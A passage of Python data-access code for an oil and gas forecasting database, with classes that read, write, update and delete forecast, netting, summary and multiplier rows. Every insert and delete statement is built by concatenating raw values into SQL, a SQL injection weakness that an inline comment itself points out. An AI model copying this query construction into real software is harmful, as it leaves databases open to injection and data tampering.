where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.ForecastDataRow(item['HeaderName'] , item['CorpID'], item['Date_Key'], item['Gas_Production'], item['Oil_Production'], item['Water_Production'],
item['GasNettingFactor'], item['OilNettingFactor'], item['WaterNettingFactor'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class ForecastDataRow:
def __init__(self, HeaderName, CorpID, Date_Key, Gas_Production, Oil_Production, Water_Production, GasNF, OilNF, WaterNF, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.HeaderName = HeaderName
self.CorpID = CorpID
self.Date_Key = Date_Key
self.Gas_Production = Gas_Production
self.Oil_Production = Oil_Production
self.Water_Production = Water_Production
if GasNF:
self.GasNF = GasNF
else:
self.GasNF = 0
if OilNF:
self.OilNF = OilNF
else:
self.OilNF = 0
if WaterNF:
self.WaterNF = WaterNF
else:
self.WaterNF = 0
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
if not self.Gas_Production:
self.Gas_Production = 0
if not self.Oil_Production:
self.Oil_Production = 0
if not self.Water_Production:
self.Water_Production = 0
insert_statement = 'insert into [LEForecastDatabase].[dbo].[Forecast_Data] (HeaderName, CorpID, Date_Key, Gas_Production, Oil_Production, Water_Production, '\
'GasNettingFactor, OilNettingFactor, WaterNettingFactor, Update_Date, Update_User)'\
' values (\'' + self.HeaderName + '\', \'' + self.CorpID + '\', convert(datetime, \'' + self.Date_Key + '\', 120) , ' + str(self.Gas_Production) + ',\n'\
'' + str(self.Oil_Production) + ', ' + str(self.Water_Production) + ', ' + str(self.GasNF) + ', ' + str(self.OilNF) + ', ' + str(self.WaterNF) + ', '\
' convert(datetime, \'' + Update_Date + '\', 120), \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for Forecast Header table, Query the table for existing entry
#HeaderName, CorpID, Date_Key
ForecastDataObj = m.ForecastData(self.DBObj, [self.HeaderName], [self.CorpID], [self.Date_Key])
rows, Success, Message = ForecastDataObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Forecast Data table. ' + str(ex))
return Success, Messages
def Delete(self):
Success = True
Messages = []
from datetime import datetime
try:
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[Forecast_Data] where HeaderName = \'' + self.HeaderName + '\' and CorpID = \'' + self.CorpID + '\' and Date_Key = \'' + self.Date_Key + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class LEHeader:
def __init__(self, DBObj, WellName=[], CorpID=[], LEName=[], LE_Date = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.table = 'LE_Header'
self.WellName = WellName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.LEName = LEName
self.LE_Date = LE_Date
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.WellName:
where_dict['WellName'] = self.WellName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.LEName:
where_dict['LEName'] = self.LEName
if self.LE_Date:
where_dict['LE_Date'] = self.LE_Date
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
header_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
#Convert df to table row objects
rows = []
for idx, item in header_df.iterrows():
row = m.LEHeaderRow(item['LEName'], item['WellName'], item['CorpID'], item['ForecastGeneratedFrom'], item['Wedge'], item['LE_Date'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class LEHeaderRow:
def __init__(self, LEName, WellName, CorpID, ForecastGeneratedFrom, Wedge, LE_Date, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.LEName = LEName
self.CorpID = CorpID
self.ForecastGeneratedFrom = ForecastGeneratedFrom
self.WellName = WellName
self.Wedge = Wedge
self.LE_Date = LE_Date
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.LE_Date, datetime):
self.LE_Date = self.LE_Date.strftime('%Y-%m-%d %H:%M:%S')
insert_statement = 'insert into [LEForecastDatabase].[dbo].[LE_Header] (LEName, WellName, CorpID, ForecastGeneratedFrom, Wedge, LE_Date, Update_User, Update_Date) \n'\
'values (\'' + self.LEName + '\', \'' + self.WellName + '\', \'' + self.CorpID + '\', \'' + self.ForecastGeneratedFrom + '\', \'' + self.Wedge + '\', convert(datetime, \'' + self.LE_Date + '\', 120), \'' + Update_User + '\', convert(datetime,\'' + Update_Date + '\', 120))'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for LE Header table, Query the table for existing entry
LEHeaderObj = m.LEHeader(self.DBObj, [self.WellName], [self.CorpID], [self.LEName], [self.LE_Date])
rows, Success, Message = LEHeaderObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Forecast Data table. ' + str(ex))
return Success, Messages
def Delete(self):
Success = True
Messages = []
#To Do - Delete all rows associated with this header as well
try:
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[LE_Header] where LEName = \'' + self.LEName + '\' and CorpID = \'' + self.CorpID + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
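# --- Note on query construction (illustrative, not original code) ---
# Write()/Delete() above build SQL by string concatenation, which breaks on
# values containing single quotes and is open to SQL injection. A minimal
# parameterized sketch, assuming a DB-API/pyodbc-style cursor (DBObj.Command
# as written only accepts a raw string, so this would require extending that
# API):
#
#   cursor.execute(
#       'insert into [LEForecastDatabase].[dbo].[LE_Header] '
#       '(LEName, WellName, CorpID, ForecastGeneratedFrom, Wedge, '
#       'LE_Date, Update_User, Update_Date) '
#       'values (?, ?, ?, ?, ?, ?, ?, ?)',
#       (self.LEName, self.WellName, self.CorpID, self.ForecastGeneratedFrom,
#        self.Wedge, self.LE_Date, Update_User, Update_Date))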
class LEData:
def __init__(self, DBObj, HeaderName=[], CorpID=[], Date_Key = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.table = 'LE_Data'
self.HeaderName = HeaderName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.Date_Key = Date_Key
def ReadTable(self):
from Model import BPXDatabase as bpx
import pandas as pd
from Model import ModelLayer as m
from datetime import datetime
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.HeaderName:
where_dict['HeaderName'] = self.HeaderName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.Date_Key:
if isinstance(self.Date_Key[0], datetime):
self.Date_Key[0] = self.Date_Key[0].strftime('%Y-%m-%d %H:%M:%S')
where_dict['Date_Key'] = self.Date_Key
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.LEDataRow(item['HeaderName'] , item['CorpID'], item['Date_Key'], item['Gas_Production'], item['Oil_Production'], item['Water_Production'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class LEDataRow:
def __init__(self, HeaderName, CorpID, Date_Key, Gas_Production, Oil_Production, Water_Production, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.HeaderName = HeaderName
self.CorpID = CorpID
self.Date_Key = Date_Key
self.Gas_Production = Gas_Production
self.Oil_Production = Oil_Production
self.Water_Production = Water_Production
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
if not self.Gas_Production:
self.Gas_Production = 0
if not self.Oil_Production:
self.Oil_Production = 0
if not self.Water_Production:
self.Water_Production = 0
insert_statement = 'insert into [LEForecastDatabase].[dbo].[LE_Data] (HeaderName, CorpID, Date_Key, Gas_Production, Oil_Production, Water_Production, Update_Date, Update_User)'\
' values (\'' + self.HeaderName + '\', \'' + self.CorpID + '\', convert(datetime, \'' + self.Date_Key + '\', 120) , ' + str(self.Gas_Production) + ',\n'\
'' + str(self.Oil_Production) + ', ' + str(self.Water_Production) + ', convert(datetime, \'' + Update_Date + '\', 120), \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for LE Data table, Query the table for existing entry
LEDataObj = m.LEData(self.DBObj, [self.HeaderName], [self.CorpID], [self.Date_Key])
rows, Success, Message = LEDataObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the LE Data table. ' + str(ex))
return Success, Messages
def Delete(self):
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[LE_Data] where HeaderName = \'' + self.HeaderName + '\' and CorpID = \'' + self.CorpID + '\' and Date_Key = \'' + self.Date_Key + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
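# --- Usage sketch (illustrative) ---
# Update() implements delete-then-rewrite "upsert" semantics: an existing row
# matching (HeaderName, CorpID, Date_Key) is deleted and rewritten, and if
# the rewrite fails the previously read row is written back. The values and
# the `db` connection below are placeholders.
#
#   from datetime import datetime
#   row = LEDataRow('Aug LE', 'C0001', datetime(2020, 8, 1),
#                   1250.0, 310.5, None, db)   # None water volume -> 0
#   success, messages = row.Update('jsmith', datetime.now())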
class GasNetting:
def __init__(self, DBObj, WellName=[], CorpID=[], NettingDate = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.table = 'GasNettingValues'
self.WellName = WellName
self.NettingDate = NettingDate
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.WellName:
where_dict['WellName'] = self.WellName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.NettingDate:
where_dict['NettingDate'] = self.NettingDate
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.GasNettingRow(item['WellName'] , item['CorpID'], item['NettingValue'], item['NettingDate'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class GasNettingRow:
def __init__(self, WellName, CorpID, NettingValue, NettingDate, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.WellName = WellName
self.CorpID = CorpID
self.NettingValue = NettingValue
self.NettingDate = NettingDate
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.NettingDate, datetime):
self.NettingDate = self.NettingDate.strftime('%Y-%m-%d %H:%M:%S')
insert_statement = 'insert into [LEForecastDatabase].[dbo].[GasNettingValues] (WellName, CorpID, NettingValue, NettingDate, Update_Date, Update_User) values \n'\
'(\'' + self.WellName + '\', \'' + self.CorpID + '\', \'' + str(self.NettingValue) + '\', \'' + self.NettingDate + '\', \'' + Update_Date + '\', \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for Netting Values table, Query the table for existing entry
NettingObj = m.GasNetting(self.DBObj, [self.WellName], [self.CorpID], [self.NettingDate])
rows, Success, Message = NettingObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Netting Data table. ' + str(ex))
return Success, Messages
def Delete(self):
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(self.NettingDate, datetime):
self.NettingDate = self.NettingDate.strftime('%Y-%m-%d %H:%M:%S')
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[GasNettingValues] where WellName = \'' + self.WellName + '\' and CorpID = \'' + self.CorpID + '\' and NettingDate = \'' + self.NettingDate + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class OilNetting:
def __init__(self, DBObj, WellName=[], CorpID=[], NettingDate = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.table = 'OilNettingValues'
self.WellName = WellName
self.CorpID = CorpID
self.NettingDate = NettingDate
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.WellName:
where_dict['WellName'] = self.WellName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.NettingDate:
where_dict['NettingDate'] = self.NettingDate
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.OilNettingRow(item['WellName'], item['CorpID'], item['NettingValue'], item['NettingDate'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class OilNettingRow:
def __init__(self, WellName, CorpID, NettingValue, NettingDate, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.WellName = WellName
self.CorpID = CorpID
self.NettingValue = NettingValue
self.NettingDate = NettingDate
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.NettingDate, datetime):
self.NettingDate = self.NettingDate.strftime('%Y-%m-%d %H:%M:%S')
insert_statement = 'insert into [LEForecastDatabase].[dbo].[OilNettingValues] (WellName, CorpID, NettingValue, NettingDate, Update_Date, Update_User) values \n'\
'(\'' + self.WellName + '\', \'' + self.CorpID + '\', \'' + str(self.NettingValue) + '\', \'' + self.NettingDate + '\', \'' + Update_Date + '\', \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for Netting Values table, Query the table for existing entry
NettingObj = m.OilNetting(self.DBObj, [self.WellName], [self.CorpID], [self.NettingDate])
rows, Success, Message = NettingObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Netting Data table. ' + str(ex))
return Success, Messages
def Delete(self):
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(self.NettingDate, datetime):
self.NettingDate = self.NettingDate.strftime('%Y-%m-%d %H:%M:%S')
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[OilNettingValues] where WellName = \'' + self.WellName + '\' and CorpID = \'' + self.CorpID + '\' and NettingDate = \'' + self.NettingDate + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class LESummary:
def __init__(self, DBObj, SummaryName=[], Wedge=[], LEName = [], GFOForecastName = []):
from Model import BPXDatabase as bpx
import pandas as pd
from Model import ModelLayer as m
self.table = 'LE_Summary'
self.SummaryName = SummaryName
self.Wedge = Wedge
self.LEName = LEName
self.GFOForecastName = GFOForecastName
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def ReadTable(self):
from Model import BPXDatabase as bpx
import pandas as pd
from Model import ModelLayer as m
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.SummaryName:
where_dict['SummaryName'] = self.SummaryName
if self.LEName:
where_dict['LEName'] = self.LEName
if self.Wedge:
where_dict['Wedge'] = self.Wedge
if self.GFOForecastName:
where_dict['GFOForecastName'] = self.GFOForecastName
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.LESummaryRow(item['SummaryName'], item['Wedge'], item['Midstream'], item['Reason'], item['Comments'], item['SummaryDate'], item['LEName'], item['GFOForecastName'], item['MonthlyAvgMBOED'], item['QuarterlyAvgMBOED'],
item['AnnualAvgMBOED'], item['MonthlyGFOMBOED'], item['QuarterlyGFOMBOED'], item['AnnualGFOMBOED'], item['MonthlyVariance'], item['QuarterlyVariance'], item['AnnualVariance'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class LESummaryRow:
def __init__(self, SummaryName, Wedge, Midstream, Reason, Comments, SummaryDate, LEName, GFOForecastName, MonthlyAvgMBOED, QuarterlyAvgMBOED,
AnnualAvgMBOED, MonthlyGFOMBOED, QuarterlyGFOMBOED, AnnualGFOMBOED, MonthlyVariance, QuarterlyVariance, AnnualVariance, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.SummaryName = SummaryName
self.Wedge = Wedge
self.Midstream = Midstream
self.Reason = Reason
self.Comments = Comments
self.SummaryDate = SummaryDate
self.LEName= LEName
self.GFOForecastName = GFOForecastName
self.MonthlyAvgMBOED = MonthlyAvgMBOED
self.QuarterlyAvgMBOED = QuarterlyAvgMBOED
self.AnnualAvgMBOED = AnnualAvgMBOED
self.MonthlyGFOMBOED = MonthlyGFOMBOED
self.QuarterlyGFOMBOED = QuarterlyGFOMBOED
self.AnnualGFOMBOED = AnnualGFOMBOED
self.MonthlyVariance = MonthlyVariance
self.QuarterlyVariance = QuarterlyVariance
self.AnnualVariance = AnnualVariance
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.SummaryDate, datetime):
self.SummaryDate = self.SummaryDate.strftime('%Y-%m-%d %H:%M:%S')
insert_statement = 'insert into [LEForecastDatabase].[dbo].[LE_Summary] (SummaryName, Wedge, Midstream, Reason, Comments, SummaryDate, \n'\
' LEName, GFOForecastName, MonthlyAvgMBOED, QuarterlyAvgMBOED, AnnualAvgMBOED, MonthlyGFOMBOED, QuarterlyGFOMBOED, AnnualGFOMBOED, \n'\
' MonthlyVariance, QuarterlyVariance, AnnualVariance, Update_Date, Update_User ) values \n'\
'(\'' + self.SummaryName + '\', \'' + self.Wedge + '\', \'' + self.Midstream + '\', \'' + self.Reason + '\', \'' + self.Comments + '\', \'' + self.SummaryDate + '\',\n'\
' \'' + self.LEName + '\', \'' + self.GFOForecastName + '\', \n'\
'\'' + str(self.MonthlyAvgMBOED) + '\', \'' + str(self.QuarterlyAvgMBOED) + '\', \'' + str(self.AnnualAvgMBOED) + '\', '\
'\'' + str(self.MonthlyGFOMBOED) + '\', \'' + str(self.QuarterlyGFOMBOED) + '\', \'' + str(self.AnnualGFOMBOED) + '\', \'' + str(self.MonthlyVariance) + '\', '\
'\'' + str(self.QuarterlyVariance) + '\', \''+ str(self.AnnualVariance) + '\', \'' + Update_Date + '\', \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for LE table, Query the table for existing entry
LESummaryObj = m.LESummary(self.DBObj, [self.SummaryName], [self.Wedge], [self.LEName], [self.GFOForecastName])
rows, Success, Message = LESummaryObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Summary table. ' + str(ex))
return Success, Messages
def Delete(self):
Success = True
Messages = []
try:
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[LE_Summary] where SummaryName = \'' + self.SummaryName + '\' and LEName = \'' + self.LEName + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class FracHitMultipliers:
def __init__(self, DBObj, LEName=[], CorpID=[], Date_Key = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.table = 'Frac_Hit_Multipliers'
self.LEName = LEName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.Date_Key = Date_Key
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.LEName:
where_dict['LEName'] = self.LEName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.Date_Key:
where_dict['Date_Key'] = self.Date_Key
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.FracHitMultipliersRow(item['LEName'] , item['CorpID'], item['Date_Key'], item['Multiplier'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class FracHitMultipliersRow:
def __init__(self, LEName, CorpID, Date_Key, Multiplier, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.LEName = LEName
self.CorpID = CorpID
self.Date_Key = Date_Key
self.Multiplier = Multiplier
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
if not isinstance(self.Multiplier, str):
self.Multiplier = str(self.Multiplier)
insert_statement = 'insert into [LEForecastDatabase].[dbo].[Frac_Hit_Multipliers] (LEName, CorpID, Date_Key, Multiplier, Update_Date, Update_User ) values \n'\
'(\'' + self.LEName + '\', \'' + self.CorpID + '\', \'' + self.Date_Key + '\', \'' + self.Multiplier + '\', \'' + Update_Date + '\', \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for Multipliers table, Query the table for existing entry
FracHitMultipliersObj = m.FracHitMultipliers(self.DBObj, [self.LEName], [self.CorpID], [self.Date_Key])
rows, Success, Message = FracHitMultipliersObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
